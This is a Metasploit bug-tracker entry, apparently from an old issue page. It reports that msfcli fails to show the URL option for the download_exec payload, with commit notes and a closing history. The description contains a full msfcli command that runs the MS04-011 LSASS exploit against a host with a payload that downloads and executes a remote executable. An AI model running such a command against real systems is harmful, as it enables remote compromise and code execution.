Bug #196
Payload "windows/download_exec/bind_tcp" - Cannot set "URL" variable via msfcli
| Status: | Closed | Start date: | ||
|---|---|---|---|---|
| Priority: | Normal | Due date: | ||
| Assignee: | HD Moore | % Done: | 0% |
|
| Category: | general | |||
| Target version: | Metasploit 3.2 | |||
| Resolution: | fixed | Release Note: |
Description
$ msfcli windows/smb/ms04_011_lsass PAYLOAD=windows/download_exec/bind_tcp URL=!http://10.0.0.1:2000/code.exe RHOST=10.0.0.2 O
... results in "URL" still being undefined. Setting "URL" via msfconsole and msfweb works. Enclosing the URL string in quotes (URL="!http://10.0.0.1:2000/sample.exe") had no effect.
Associated revisions
Fixes #196. Correctly show set options in the 'O' mode
git-svn-id: file:///home/svn/framework3/trunk@5854 4d416f70-5f16-0410-b530-b9f4589650da
Switch to netlink for listing interfaces
- Adds support for listing IPv6 addresses on POSIX meterpreter
- Ensures crash logs are only created if debugging is enabled
- Fixes a bug in sniffer where a lock was not acquired correctly
Squashed commit of the following:
commit 955124b264a675c7d67187703bf23b58f0aba6d8
Author: MM <gaspmat@gmail.com>
Date: Thu Feb 23 23:42:26 2012 +0100
posix meterpreter - IPv6 support for route and ipconfig using netlink sockets
[Closes #196]
History
#1 Updated by over 4 years ago
If one sets and saves "URL" globally via msfconsole, msfcli successfully uses it.
#2 Updated by HD Moore over 4 years ago
Odd bug. Will look into it.
#3 Updated by HD Moore over 3 years ago
The displayed options are incorrect, but the variable is being set properly.
#4 Updated by HD Moore over 3 years ago
- Status changed from New to Closed
- Resolution set to fixed
(In r5854) Fixes #196. Correctly show set options in the 'O' mode